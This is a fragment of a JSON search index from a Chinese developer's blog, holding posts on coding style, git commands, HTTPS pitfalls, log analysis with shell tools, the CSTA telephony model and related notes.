nameList = [\u0026#39;wdd\u0026#39;,\u0026#39;ddw\u0026#39;,\u0026#39;dwd\u0026#39;]; // // bad var ill10o = 10; //千万不要把i,1,l,0,o,O放在一起,傻傻分不清楚 // good var illOne = 10; 3. 做有意义的区分 // bad var userData, userInfo; // Data和Info, 有什么区别????, 不要再用data和info这样模糊不清的单词了 // good var userProfile, userAcount 4. 使用读得出来的名称 // bad var beeceearrthrtee; // 你知道怎么读吗? 鼻涕阿三?? // good var userName; 5.","title":"代码整洁之道 - 有意义的命名"},{"content":"1. HTTPS域向HTTP域发送请求会被浏览器直接拒绝,HTTP向HTTPS则不会 例如在github pages页面,这是一个https页面,如果在这个页面向http发送请求,那么会直接被浏览器拒绝,并在控制台输出下面的报错信息。\njquery-1.11.3.min.js:5 Mixed Content: The page at \u0026#39;https://wangduanduan.github.io/ddddddd/\u0026#39; was loaded over HTTPS, but requested an insecure XMLHttpRequest endpoint \u0026#39;http://cccccc/\u0026#39;. This request has been blocked; the content must be served over HTTPS. 如果你在做第三方集成的系统,如果他们是在浏览器中直接调用你提供的接口,那么最好你使用https协议,这样无论对方是https还是http都可以访问。(相信我,这个很重要,我曾经经历过上线后遇到这个问题,然后连夜申请证书,把http升级到https的痛苦经历)\n2. HTTPS的默认端口是443,而不是443 如果443端口已经被其他服务占用了,那么使用其他任何没有被占用的端口都可以用作HTTPS服务,只不过在请求的时候需要加上端口号罢了。\n","permalink":"https://wdd.js.org/network/of5hny/","summary":"1. HTTPS域向HTTP域发送请求会被浏览器直接拒绝,HTTP向HTTPS则不会 例如在github pages页面,这是一个https页面,如果在这个页面向http发送请求,那么会直接被浏览器拒绝,并在控制台输出下面的报错信息。\njquery-1.11.3.min.js:5 Mixed Content: The page at \u0026#39;https://wangduanduan.github.io/ddddddd/\u0026#39; was loaded over HTTPS, but requested an insecure XMLHttpRequest endpoint \u0026#39;http://cccccc/\u0026#39;. This request has been blocked; the content must be served over HTTPS. 如果你在做第三方集成的系统,如果他们是在浏览器中直接调用你提供的接口,那么最好你使用https协议,这样无论对方是https还是http都可以访问。(相信我,这个很重要,我曾经经历过上线后遇到这个问题,然后连夜申请证书,把http升级到https的痛苦经历)\n2. HTTPS的默认端口是443,而不是443 如果443端口已经被其他服务占用了,那么使用其他任何没有被占用的端口都可以用作HTTPS服务,只不过在请求的时候需要加上端口号罢了。","title":"可能被遗漏的https与http的知识点"},{"content":"原文地址:https://hackernoon.com/few-simple-rules-for-good-coding-my-15-years-experience-96cb29d4acd9#.ddzpjb80c\n嗨,我的工作作为一个程序员超过15年,并使用许多不同的语言,范例,框架和其他狗屎。我想和大家分享我写好代码的规则。\n1. 优化VS可读性 去他妈的优化 始终编写易于阅读且对开发人员可理解的代码。因为在硬可读代码上花费的时间和资源将远远高于从优化中获得的。如果你需要进行优化,那么使它像DI的独立模块,具有100%的测试覆盖率,并且不会被触及至少一年。\n2. 架构第一 我看到很多人说“我们需要快速做事,我们没有时间做架构”。其中约99%的人因为这样的想法而遇到了大问题。编写代码而不考虑其架构是没有用的,就像没有实现它们的计划一样,梦想你的愿望。在编写代码的第一行之前,你应该明白它将要做什么,它将如何使用,模块,服务如何相互工作,它将有什么结构,如何进行测试和调试,以及如何更新。\n3. 测试覆盖率 测试是好事,但他们并不总是负担得起,对项目有意义。\n当你需要测试:\n当你编写模块时,微服务将不会被触及至少一个月。 当你编写开源代码。 当你编写涉及金融渠道的核心代码或代码。 当您有代码更新的同时更新测试的资源。 当你不需要测试时:\n当你是一个创业。 当你有小团队和代码更改是快速。 当你编写的脚本,可以简单地通过他们的输出手动测试。 记住,带有严格测试的代码可能比没有测试的代码更有害。\n4. 保持简单,极度简单 不要编写复杂的代码。更多更简单,那么更少的错误它可能有和更少的时间来调试它们。代码应该做的只是它需要没有非常多的抽象和其他OOP shit(尤其是涉及java开发人员)+ 20%的东西可能需要在将来以简单的方式更新它。\n5. 注释 出现注释说明你的代码不够好。好的代码应该是可以理解的,没有一行注释。但是如何为新开发人员节省时间? - 编写简单的内联文档描述什么和如何方法工作。这将节省很多时间来理解,甚至更多 - 它将给人们更多的机会来提出更好的实施这种方法。并且它将是全球代码文档的良好开端。\n6. 硬耦合VS较小耦合 始终尝试使用微服务架构。单片软件可以比微服务软件运行得更快,但只能在一个服务器的上下文中运行。微服务使您可以不仅在许多服务器上,而且有时甚至在一台机器上(我的意思是过程分发)高效地分发您的软件。\n7. 代码审查 代码审查可以是好的,也以是坏的。您可以组织代码审查,只有当您有开发人员了解95%的代码,谁可以监控所有更新,而不浪费很多时间。在其他情况下,这将是只是耗时,每个人都会讨厌这个。\n在这部分有很多问题,所以更深入地描述这一点。\n许多人认为代码审查是一个很好的方式教新手,或者工作在不同部分的代码的队友。但是代码审查的主要目标是保持代码质量,而不是教学。让我们想象你的团队制作代码用于控制核反应堆或太空火箭发动机的冷却系统。你在非常硬的逻辑中犯了巨大的错误,然后你给这个代码审查新的家伙。你怎么认为会发生意外的风险? - 我的练习率超过70%。\n良好的团队是每个人都有自己的角色,负责确切的工作。如果有人想要理解另一段代码,那么他去一个负责任去问他。你不可能知道一切,更好的优秀的理解小块代码而不是理解所有。\n8. 重构没啥用 在我的职业生涯中,我听到很多次“不要担心,我们以后会重构它”。在未来,这会导致大的技术债务或从头开始删除所有的代码和写作。\n所以,不要得到一个债务,除非你有钱从头开发你的软件几次。\n9. 当你累了或在一个坏的心情不要写代码。 当开发人员厌倦时,他们正在制造2到5倍或者更多的bug。所以工作更多是非常糟糕的做法。这就是为什么越来越多的国家思考6小时工作日,其中一些已经有了。精神工作不同于使用你的二头肌。\n10. 不要一次写全部 - 使开发迭代 在编写代码分析和预测之前,您的客户/客户真正需要什么,然后选择您可以在短期内以高质量开发的MVF(最有价值的功能)。使用这样的迭代来部署质量更新,而不是腰部时间和资源对不合理的愿望和牺牲与质量。\n11. 自动化VS手动 自动化是长期的100%成功。所以如果你有资源自动化的东西,现在应该做。你可能认为“只需要5分钟,为什么我应该自动化?但让我计算这个。例如,它是5个开发人员的日常任务。 5分钟_ 5天_ 21天* 12个月= 6 300分钟= 105小时= 13.125天〜5250 $。如果你有40 000名员工,这将需要多少费用?\n12. 出去浪,学习新爱好 差异化工作可以增加心智能力,并提供新想法。所以,暂停现在的工作,出去呼吸一下新鲜空气,与朋友交谈,弹吉他等。ps: 莫春者,春服既成,冠者五六人,童子六七人,浴乎沂,风乎舞雩,咏而归。------《论语.先进》。\n13. 在空闲时间学习新事物 当人们停止学习时,他们开始退化。\n","permalink":"https://wdd.js.org/posts/2019/10/corgz1/","summary":"原文地址:https://hackernoon.com/few-simple-rules-for-good-coding-my-15-years-experience-96cb29d4acd9#.ddzpjb80c\n嗨,我的工作作为一个程序员超过15年,并使用许多不同的语言,范例,框架和其他狗屎。我想和大家分享我写好代码的规则。\n1. 优化VS可读性 去他妈的优化 始终编写易于阅读且对开发人员可理解的代码。因为在硬可读代码上花费的时间和资源将远远高于从优化中获得的。如果你需要进行优化,那么使它像DI的独立模块,具有100%的测试覆盖率,并且不会被触及至少一年。\n2. 架构第一 我看到很多人说“我们需要快速做事,我们没有时间做架构”。其中约99%的人因为这样的想法而遇到了大问题。编写代码而不考虑其架构是没有用的,就像没有实现它们的计划一样,梦想你的愿望。在编写代码的第一行之前,你应该明白它将要做什么,它将如何使用,模块,服务如何相互工作,它将有什么结构,如何进行测试和调试,以及如何更新。\n3. 测试覆盖率 测试是好事,但他们并不总是负担得起,对项目有意义。\n当你需要测试:\n当你编写模块时,微服务将不会被触及至少一个月。 当你编写开源代码。 当你编写涉及金融渠道的核心代码或代码。 当您有代码更新的同时更新测试的资源。 当你不需要测试时:\n当你是一个创业。 当你有小团队和代码更改是快速。 当你编写的脚本,可以简单地通过他们的输出手动测试。 记住,带有严格测试的代码可能比没有测试的代码更有害。\n4. 保持简单,极度简单 不要编写复杂的代码。更多更简单,那么更少的错误它可能有和更少的时间来调试它们。代码应该做的只是它需要没有非常多的抽象和其他OOP shit(尤其是涉及java开发人员)+ 20%的东西可能需要在将来以简单的方式更新它。\n5. 注释 出现注释说明你的代码不够好。好的代码应该是可以理解的,没有一行注释。但是如何为新开发人员节省时间? - 编写简单的内联文档描述什么和如何方法工作。这将节省很多时间来理解,甚至更多 - 它将给人们更多的机会来提出更好的实施这种方法。并且它将是全球代码文档的良好开端。\n6. 硬耦合VS较小耦合 始终尝试使用微服务架构。单片软件可以比微服务软件运行得更快,但只能在一个服务器的上下文中运行。微服务使您可以不仅在许多服务器上,而且有时甚至在一台机器上(我的意思是过程分发)高效地分发您的软件。\n7. 代码审查 代码审查可以是好的,也以是坏的。您可以组织代码审查,只有当您有开发人员了解95%的代码,谁可以监控所有更新,而不浪费很多时间。在其他情况下,这将是只是耗时,每个人都会讨厌这个。\n在这部分有很多问题,所以更深入地描述这一点。\n许多人认为代码审查是一个很好的方式教新手,或者工作在不同部分的代码的队友。但是代码审查的主要目标是保持代码质量,而不是教学。让我们想象你的团队制作代码用于控制核反应堆或太空火箭发动机的冷却系统。你在非常硬的逻辑中犯了巨大的错误,然后你给这个代码审查新的家伙。你怎么认为会发生意外的风险? - 我的练习率超过70%。\n良好的团队是每个人都有自己的角色,负责确切的工作。如果有人想要理解另一段代码,那么他去一个负责任去问他。你不可能知道一切,更好的优秀的理解小块代码而不是理解所有。\n8. 重构没啥用 在我的职业生涯中,我听到很多次“不要担心,我们以后会重构它”。在未来,这会导致大的技术债务或从头开始删除所有的代码和写作。\n所以,不要得到一个债务,除非你有钱从头开发你的软件几次。\n9. 当你累了或在一个坏的心情不要写代码。 当开发人员厌倦时,他们正在制造2到5倍或者更多的bug。所以工作更多是非常糟糕的做法。这就是为什么越来越多的国家思考6小时工作日,其中一些已经有了。精神工作不同于使用你的二头肌。\n10. 不要一次写全部 - 使开发迭代 在编写代码分析和预测之前,您的客户/客户真正需要什么,然后选择您可以在短期内以高质量开发的MVF(最有价值的功能)。使用这样的迭代来部署质量更新,而不是腰部时间和资源对不合理的愿望和牺牲与质量。\n11. 自动化VS手动 自动化是长期的100%成功。所以如果你有资源自动化的东西,现在应该做。你可能认为“只需要5分钟,为什么我应该自动化?但让我计算这个。例如,它是5个开发人员的日常任务。 5分钟_ 5天_ 21天* 12个月= 6 300分钟= 105小时= 13.125天〜5250 $。如果你有40 000名员工,这将需要多少费用?","title":"【译】13简单的优秀编码规则(从我15年的经验)"},{"content":"如果命令行可以解决的问题,就绝对不要用GUI工具。快点试用Git bash吧, 别再用TortoiseGit了。\n1. 必会8个命令 下面的操作都是经常使用的,有些只需要做一次,有些是经常操作的\ngit命令虽然多,但是经常使用的不超过8个。\n命令 执行次数 说明 git clone http://sdfjslf.git 每个项目只需要执行一次 //克隆一个项目 git fetch origin round-2 每个分支只需要执行一次 //round-2分支在本地不存在,首先要创建一个分支 git checkout round-2 多次 // 切换到round-2分支 git branch --set-upstream-to=origin/round-2 每个分支只需要执行一次 // 将本地round-2分支关联远程round-2分支 git add -A 每次增加文件都要执行 // 在round-2下创建了一个文件, 使用-A可以添加所有文件到暂存区 git commit -am \u0026quot;我增加了一个文件\u0026quot; 每次提交都要执行 // commit git push 每次推送都要执行 //最好是在push之前,使用git pull拉去远程代码到本地,否则有可能被拒绝 git pull 每次拉去都要执行 拉去远程分支代码到本地并合并到当前分支 2. 常用的git命令 假设你在master分支上\n// 将本地修改后的文件推送到本地仓库 git commit -am \u0026#39;修改了一个问题\u0026#39; // 将本地仓库推送到远程仓库 git push 2.1. 状态管理 2.1.1. 状态查看 查看当前仓库状态\ngit status 2.2. 分支管理 2.2.1. 分支新建 基于当前分支,创建test分支\n// 创建dev分支 git checkout dev // 创建dev分支后,切换到dev分支 git checkout -b dev // 以某个commitId为起点创建分支 git checkout -b new-branch-name commit-id 2.2.2. 分支查看 查看远程分支: git branch -r\n// 查看本地分支 git branch // 查看远程分支 git branch -r // 查看所有分支 git branch -a 2.2.3. 分支切换 切换到某个分支: git checkout 0.10.7\n\u0026gt; git checkout 0.10.7 Branch 0.10.7 set up to track remote branch 0.10.7 from origin. Switched to a new branch \u0026#39;0.10.7\u0026#39; 2.2.4. 分支合并 将master分支合并到0.10.7分支: git merge\n\u0026gt; git merge master Merge made by the \u0026#39;recursive\u0026#39; strategy. public/javascripts/app-qc.js | 83 +++++++++++++++++++++++++-- views/menu.html | 1 + views/qc-template-show-modal.html | 114 ++++++++++++++++++++++++++++++++++++++ views/qc-template.html | 7 ++- 4 files changed, 198 insertions(+), 7 deletions(-) create mode 100644 views/qc-template-show-modal.html // 有时候只想合并某次commit到当前分支,而不是合并整个分支,可以使用 cherry-pick 合并 git cherry-pick commmitId 2.2.5. 分支删除 // 删除远程dev分支 git push --delete origin dev // 删除本地dev分支 git branch -D dev 2.2.6. 拉取本地不存在的远程分支 // 假设现在在master分支, 我需要拉去远程的dev分支到本地,而本地没有dev分支 // 拉取远程分支到本地 git fetch orgin 远程分支名:本地分支名 git fetch origin dev:dev // 切换到dev分支 git checkout dev // 本地dev分支关联远程dev分支, 如果不把本地dev分支关联远程dev分支,则执行git pull和git push命令时会报错 git branch --set-upstream-to=origin/dev // 然后你就可以在dev分支上编辑了 2.3. 版本对比 // 查看尚未暂存的文件更新了哪些部分 git diff // 查看某两个版本之间的差异 git diff commitID1 commitID2 // 查看某两个版本的某个文件之间的差异 git diff commitID1:filename1 commitID2:filename2 2.4. 日志查看 git log git short-log 2.5. 撤销修改 2.5.1. 撤销处于修改状态的文件 如果你修改了某个文件,但是还没有commit到本地仓库。\ngit checkout -- somefile.js 2.5 丢弃所有未提交的改变 git clean 用来删除未跟踪的新创建的文件或者文件夹\ngit checkout . \u0026amp;\u0026amp; git clean -xdf\ngit clean\n-x 不读取gitignore中的忽略规则 -d 删除所有未跟踪的文件和文件夹 -f 强制 3. oh-my-zsh中常用的git缩写 alias ga=\u0026#39;git add\u0026#39; alias gb=\u0026#39;git branch\u0026#39; alias gba=\u0026#39;git branch -a\u0026#39; alias gbd=\u0026#39;git branch -d\u0026#39; alias gcam=\u0026#39;git commit -a -m\u0026#39; alias gcb=\u0026#39;git checkout -b\u0026#39; alias gco=\u0026#39;git checkout\u0026#39; alias gcm=\u0026#39;git checkout master\u0026#39; alias gcp=\u0026#39;git cherry-pick\u0026#39; alias gd=\u0026#39;git diff\u0026#39; alias gfo=\u0026#39;git fetch origin\u0026#39; alias ggpush=\u0026#39;git push origin $(git_current_branch)\u0026#39; alias ggsup=\u0026#39;git branch --set-upstream-to=origin/$(git_current_branch)\u0026#39; alias glgp=\u0026#39;git log --stat -p\u0026#39; alias gm=\u0026#39;git merge\u0026#39; alias gp=\u0026#39;git push\u0026#39; alias gst=\u0026#39;git status\u0026#39; alias gsta=\u0026#39;git stash save\u0026#39; alias gstp=\u0026#39;git stash pop\u0026#39; alias gl=\u0026#39;git pull\u0026#39; alias glg=\u0026#39;git log --stat\u0026#39; alias glgp=\u0026#39;git log --stat -p\u0026#39; alias glgga=\u0026#39;git log --graph --decorate --all\u0026#39; // 图形化查看分支之间的发展关系 oh-my-zsh git命令缩写完整版\n4. 参考文献 git 命令参考 《Pro Git 中文版》 廖雪峰 git教程 猴子都能懂的GIT入门 ","permalink":"https://wdd.js.org/posts/2019/10/gmb0oi/","summary":"如果命令行可以解决的问题,就绝对不要用GUI工具。快点试用Git bash吧, 别再用TortoiseGit了。\n1. 必会8个命令 下面的操作都是经常使用的,有些只需要做一次,有些是经常操作的\ngit命令虽然多,但是经常使用的不超过8个。\n命令 执行次数 说明 git clone http://sdfjslf.git 每个项目只需要执行一次 //克隆一个项目 git fetch origin round-2 每个分支只需要执行一次 //round-2分支在本地不存在,首先要创建一个分支 git checkout round-2 多次 // 切换到round-2分支 git branch --set-upstream-to=origin/round-2 每个分支只需要执行一次 // 将本地round-2分支关联远程round-2分支 git add -A 每次增加文件都要执行 // 在round-2下创建了一个文件, 使用-A可以添加所有文件到暂存区 git commit -am \u0026quot;我增加了一个文件\u0026quot; 每次提交都要执行 // commit git push 每次推送都要执行 //最好是在push之前,使用git pull拉去远程代码到本地,否则有可能被拒绝 git pull 每次拉去都要执行 拉去远程分支代码到本地并合并到当前分支 2. 常用的git命令 假设你在master分支上\n// 将本地修改后的文件推送到本地仓库 git commit -am \u0026#39;修改了一个问题\u0026#39; // 将本地仓库推送到远程仓库 git push 2.1. 状态管理 2.","title":"gitbash生存指南 之 git常用命令与oh-my-zsh常用缩写"},{"content":"免费产品的盈利模式有四种\n投放广告 增值服务:先把羊养肥,再慢慢割羊毛,现在大部分都是互联网服务都是这种 交叉补贴: A服务免费,再用户使用A服务时,通过提供B服务来盈利 零边际成本:免费提供A服务,但是用户需要用物品去交换A服务,服务提供者通过加工物品来盈利 ","permalink":"https://wdd.js.org/posts/2019/10/ce03id/","summary":"免费产品的盈利模式有四种\n投放广告 增值服务:先把羊养肥,再慢慢割羊毛,现在大部分都是互联网服务都是这种 交叉补贴: A服务免费,再用户使用A服务时,通过提供B服务来盈利 零边际成本:免费提供A服务,但是用户需要用物品去交换A服务,服务提供者通过加工物品来盈利 ","title":"免费服务的盈利模式"},{"content":"1. 实验准备 T450笔记本 2. 进入BIOS 重启电脑 一直不停按enter 按F1 选择Keyboard/mouse 3. 恢复F1-F2恢复原始功能: fn and ctrl key swap [enabled]\n4. 切换ctrl和ctrl的位置: F1-F12 as primary function [enabled]\n5. 保存,退出 ","permalink":"https://wdd.js.org/posts/2019/10/qzbgvf/","summary":"1. 实验准备 T450笔记本 2. 进入BIOS 重启电脑 一直不停按enter 按F1 选择Keyboard/mouse 3. 恢复F1-F2恢复原始功能: fn and ctrl key swap [enabled]\n4. 切换ctrl和ctrl的位置: F1-F12 as primary function [enabled]\n5. 保存,退出 ","title":"thinkpad 系列恢复F1-F12原始功能,切换ctrl和fn的位置"},{"content":"1. 内容概要 CSTA 协议与标准概述 CSTA OpenScape 语音架构概述 2. CSTA 协议标准 2.1. 什么是 CSTA ? CSTA:电脑支持通讯程序(Computer Supported TelecommunicationsApplications) 基本的呼叫模型在 1992 建立,后来随着行业发展,呼叫模型也被加强和扩展,例如新的协议等等 CSTA 是一个应用层接口,用来监控呼叫,设备和网络 CSTA 创建了一个通讯程序的抽象层: CSTA 并不依赖任何底层的信令协议 E.g.H.323,SIP,Analog,T1,ISDN,etc. CSTA 并不要求用户必须使用某些设备 E.g.intelligentendpoints,low-function/stimulusdevices,SIPSignalingmodels-3PCC vs. Peer/Peer 适用不同的操作模式 第三方呼叫控制 一方呼叫控制 CSTA 的设计目标是为了提高各种 CSTA 实现之间的移植性 规范化呼叫模型和行为 完成服务、事件定义 规范化标准 3. CSTA 标准的进化史 阶段 1 (发布于 June ’92) 40 特性, 66 页 (服务定义) 专注于呼叫控制 阶段 2 (发布于 Dec. ’94) 77 特性, 145 页 (服务定义) I/O \u0026amp; 语音单元服务, 更多呼叫控制服务 阶段 3 - CSTA Phase II Features \u0026amp; versit CTI Technology 发布于 Dec. ‘98 136 特性, 650 页 (服务定义) 作为 ISO 标准发布于 July 2000 发布 CSTA XML (ECMA-323) June 2004 发布 “Using CSTA with Voice Browsers” (TR/85) Dec. 02 发布 CSTA WSDL (ECMA-348) June 2004 June 2004: 发布对象模型 TR/88 June 2004: 发布 “Using CSTA for SIP Phone User Agents (uaCSTA)” TR/87 June 2004: 发布 “Application Session Services” (ECMA-354) June 2005: 发布 “WS-Session: WSDL for ECMA-354”(ECMA-366) December 2005 : 发布 “Management Notification and Computing FunctionServices” December 2005 : Session Management, Event Notification, Amendements for ECMA-348” (TR/90) December 2006 : Published new editions of ECMA-269, ECMA-323, ECMA-348 4. CSTA 标准文档 5. CSTA 标准扩展 新的特性可以被加入标准通过发布新版本的标准 新的参数,新的值可以被加入通过发布新版本的标准 未来的新版本必须下向后兼容 具体的实施可以增加属性通过 CSTA 自带的扩展机制(e.g. ONS – One Number Service) 6. CSTA 操作模型 CSTA 操作模型由计算域和转换域组成,是 CSTA 定义在两个域之间的接口 CSTA 标准规定了消息(服务以及事件上报),还有与之相关的行为 计算域是 CSTA 程序的宿主环境,用来与转换域交互与控制 转换域 - CSTA 模型提供抽象层,程序可以观测并控制的。转换渔包括一些对象例如 CSTA 呼叫,设备,链接。 7. CSTA 操作模型:呼叫,设备,链接 相关说明是的的的的\n8. 参考 CSTAoverview CSTA_introduction_and_overview ","permalink":"https://wdd.js.org/opensips/ch1/csta-call-model/","summary":"1. 内容概要 CSTA 协议与标准概述 CSTA OpenScape 语音架构概述 2. CSTA 协议标准 2.1. 什么是 CSTA ? CSTA:电脑支持通讯程序(Computer Supported TelecommunicationsApplications) 基本的呼叫模型在 1992 建立,后来随着行业发展,呼叫模型也被加强和扩展,例如新的协议等等 CSTA 是一个应用层接口,用来监控呼叫,设备和网络 CSTA 创建了一个通讯程序的抽象层: CSTA 并不依赖任何底层的信令协议 E.g.H.323,SIP,Analog,T1,ISDN,etc. CSTA 并不要求用户必须使用某些设备 E.g.intelligentendpoints,low-function/stimulusdevices,SIPSignalingmodels-3PCC vs. Peer/Peer 适用不同的操作模式 第三方呼叫控制 一方呼叫控制 CSTA 的设计目标是为了提高各种 CSTA 实现之间的移植性 规范化呼叫模型和行为 完成服务、事件定义 规范化标准 3. CSTA 标准的进化史 阶段 1 (发布于 June ’92) 40 特性, 66 页 (服务定义) 专注于呼叫控制 阶段 2 (发布于 Dec. ’94) 77 特性, 145 页 (服务定义) I/O \u0026amp; 语音单元服务, 更多呼叫控制服务 阶段 3 - CSTA Phase II Features \u0026amp; versit CTI Technology 发布于 Dec.","title":"CSTA 呼叫模型简介"},{"content":"test.log\n2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;A\u0026#34; loginIn 2019-1010-1920 192.345.23.1 cause:\u0026#34;BBB\u0026#34; type:\u0026#34;A\u0026#34; loginIn 2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;S\u0026#34; loginIn 2019-1010-1920 192.345.23.1 cause:\u0026#34;BBJ\u0026#34; type:\u0026#34;A\u0026#34; loginIn 按列分割 提取第三列\n日志列数比较少或则要提取的字段比较靠前时,优先使用 awk。当然 cut 也可以做到。\n比如输出日志的第三列\nawk \u0026#39;{print $3}\u0026#39; test.log // $3表示第三列 cut -d \u0026#34; \u0026#34; -f3 test.log // -f3指定第三列, -d用来指定分割符 正则提取 提取 cause 字段的原因值?\n2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;A\u0026#34; loginIn 2019-1010-1920 192.345.23.1 type:\u0026#34;A\u0026#34; loginIn cause:\u0026#34;BBB\u0026#34; 2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;S\u0026#34; loginIn 2019-1010-1920 192.345.23.1 type:\u0026#34;A\u0026#34; cause:\u0026#34;BBJ\u0026#34; loginIn 当要提取的内容不在同一列时,往往就无法用cut或者awk就按列提取。最好用的方式是用 grep 的正则提取。\n好像 grep 不支持捕获分组,所以只能提取出出 cause:\u0026ldquo;AAA\u0026rdquo;,而无法直接提取出 AAA\nE 表示使用正则 o 表示只显示匹配到的内容 \u0026gt; grep -Eo \u0026#39;cause:\u0026#34;.*?\u0026#34;\u0026#39; test.log cause:\u0026#34;AAA\u0026#34; cause:\u0026#34;BBB\u0026#34; cause:\u0026#34;AAA\u0026#34; cause:\u0026#34;BBJ\u0026#34; 统计 对输出的关键词进行统计,并按照升序或者降序排列。\n将关键词按照列或者按照正则提取出来之后,首先要进行sort排序, 然后再进行uniq去重。\n不进行排序就直接去重,统计的值就不准确。因为 uniq 去重只能去除连续的相同字符串。不是连续的字符串,则会统计多次。\n下面例子:非连续的 cause:\u0026ldquo;AAA\u0026rdquo;,没有被合并在一起计数\n// bad grep -Eo \u0026#39;cause:\u0026#34;.*?\u0026#34;\u0026#39; test.log | uniq -c 1 cause:\u0026#34;AAA\u0026#34; 1 cause:\u0026#34;BBB\u0026#34; 1 cause:\u0026#34;AAA\u0026#34; 1 cause:\u0026#34;BBJ\u0026#34; // good AAA 被正确统计了 grep -Eo \u0026#39;cause:\u0026#34;.*?\u0026#34;\u0026#39; test.log | sort | uniq -c 2 cause:\u0026#34;AAA\u0026#34; 1 cause:\u0026#34;BBB\u0026#34; 1 cause:\u0026#34;BBJ\u0026#34; 对统计值排序 sort 默认的排序是按照字典排序, 可以使用-n 参数让其按照数值大小排序。\nn 按照数值排序 r 取反。sort 按照数值排序是,默认是升序,如果想要结果降序,那么需要-r -k -k 可以指定按照某列的数值顺序排序,如-k1,1(指定第一列), -k2,2(指定第二列)。如果不指定-k 参数,那么一般默认第一列。 // 升序排序 grep -Eo \u0026#39;cause:\u0026#34;.*?\u0026#34;\u0026#39; test.log | sort |uniq -c | sort -n 1 cause:\u0026#34;BBB\u0026#34; 1 cause:\u0026#34;BBJ\u0026#34; 2 cause:\u0026#34;AAA\u0026#34; // 降序排序 grep -Eo \u0026#39;cause:\u0026#34;.*?\u0026#34;\u0026#39; test.log | sort |uniq -c | sort -nr 2 cause:\u0026#34;AAA\u0026#34; 1 cause:\u0026#34;BBJ\u0026#34; 1 cause:\u0026#34;BBB\u0026#34; ","permalink":"https://wdd.js.org/shell/grep-awk-sort/","summary":"test.log\n2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;A\u0026#34; loginIn 2019-1010-1920 192.345.23.1 cause:\u0026#34;BBB\u0026#34; type:\u0026#34;A\u0026#34; loginIn 2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;S\u0026#34; loginIn 2019-1010-1920 192.345.23.1 cause:\u0026#34;BBJ\u0026#34; type:\u0026#34;A\u0026#34; loginIn 按列分割 提取第三列\n日志列数比较少或则要提取的字段比较靠前时,优先使用 awk。当然 cut 也可以做到。\n比如输出日志的第三列\nawk \u0026#39;{print $3}\u0026#39; test.log // $3表示第三列 cut -d \u0026#34; \u0026#34; -f3 test.log // -f3指定第三列, -d用来指定分割符 正则提取 提取 cause 字段的原因值?\n2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;A\u0026#34; loginIn 2019-1010-1920 192.345.23.1 type:\u0026#34;A\u0026#34; loginIn cause:\u0026#34;BBB\u0026#34; 2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;S\u0026#34; loginIn 2019-1010-1920 192.345.23.1 type:\u0026#34;A\u0026#34; cause:\u0026#34;BBJ\u0026#34; loginIn 当要提取的内容不在同一列时,往往就无法用cut或者awk就按列提取。最好用的方式是用 grep 的正则提取。","title":"awk、grep、cut、sort、uniq简单命令玩转日志分析与统计"},{"content":"https://winmerge.org/?lang=en\nWinMerge-2.16.4-Setup.exe.zip\n","permalink":"https://wdd.js.org/posts/2019/10/zo8dx2/","summary":"https://winmerge.org/?lang=en\nWinMerge-2.16.4-Setup.exe.zip","title":"windows上免费的文本对比工具"},{"content":"route_tree表中需要增加carrier\nid carrier 0 default ","permalink":"https://wdd.js.org/opensips/ch7/without-default-carrier/","summary":"route_tree表中需要增加carrier\nid carrier 0 default ","title":"ERROR:carrierroute:carrier_tree_fixup: default_carrier not found"},{"content":"Step 1: Install Required PackagesFirstly we need to make sure that we have installed required packages on your system. Use following command to install required packages before compiling Git source.\n# yum install curl-devel expat-devel gettext-devel openssl-devel zlib-devel # yum install gcc perl-ExtUtils-MakeMaker Step 2: Uninstall old Git RPMNow remove any prior installation of Git through RPM file or Yum package manager. If your older version is also compiled through source, then skip this step.\n# yum remove git Step 3: Download and Compile Git SourceDownload git source code from kernel git or simply use following command to download Git 2.5.3.\n# cd /usr/src # wget https://www.kernel.org/pub/software/scm/git/git-2.5.3.tar.gz # tar xzf git-2.5.3.tar.gz After downloading and extracting Git source code, Use following command to compile source code.\n# cd git-2.5.3 # make prefix=/usr/local/git all # make prefix=/usr/local/git install # echo \u0026#39;pathmunge /usr/local/git/bin/\u0026#39; \u0026gt; /etc/profile.d/git.sh # chmod +x /etc/profile.d/git.sh # source /etc/bashrc Step 4. Check Git VersionOn completion of above steps, you have successfully install Git in your system. Use the following command to check the git version\n# git --version git version 2.5.3 I also wanted to add that the \u0026ldquo;Getting Started\u0026rdquo; guide at the GIT website also includes instructions on how to download and compile it yourself:\n","permalink":"https://wdd.js.org/posts/2019/10/gxkb91/","summary":"Step 1: Install Required PackagesFirstly we need to make sure that we have installed required packages on your system. Use following command to install required packages before compiling Git source.\n# yum install curl-devel expat-devel gettext-devel openssl-devel zlib-devel # yum install gcc perl-ExtUtils-MakeMaker Step 2: Uninstall old Git RPMNow remove any prior installation of Git through RPM file or Yum package manager. If your older version is also compiled through source, then skip this step.","title":"手工安装git最新版"},{"content":"有些项目,文档写的不是很清楚,很多地方都需要摸着石头过河,在此写下自己的一点心得体会。\n后悔药 哪怕是改动一行代码,也要创建一个新的分支。如果发现前方有无法绕行的故障,你将会庆幸自己给自己留下退路。\n不要把自己逼到死角,永远给自己留下一个B计划。\n小碎步 不要大段重构,要小步慢走。尽量减少发生问题的点。在一本书中找错别字很难,但是在一行文字中找错别字就非常容易了。\n勿猜测 当你不知道某个函数如何使用时,不要去猜测,而应该去看官方文档是如何讲解这个函数的。\n","permalink":"https://wdd.js.org/posts/2019/10/bl933p/","summary":"有些项目,文档写的不是很清楚,很多地方都需要摸着石头过河,在此写下自己的一点心得体会。\n后悔药 哪怕是改动一行代码,也要创建一个新的分支。如果发现前方有无法绕行的故障,你将会庆幸自己给自己留下退路。\n不要把自己逼到死角,永远给自己留下一个B计划。\n小碎步 不要大段重构,要小步慢走。尽量减少发生问题的点。在一本书中找错别字很难,但是在一行文字中找错别字就非常容易了。\n勿猜测 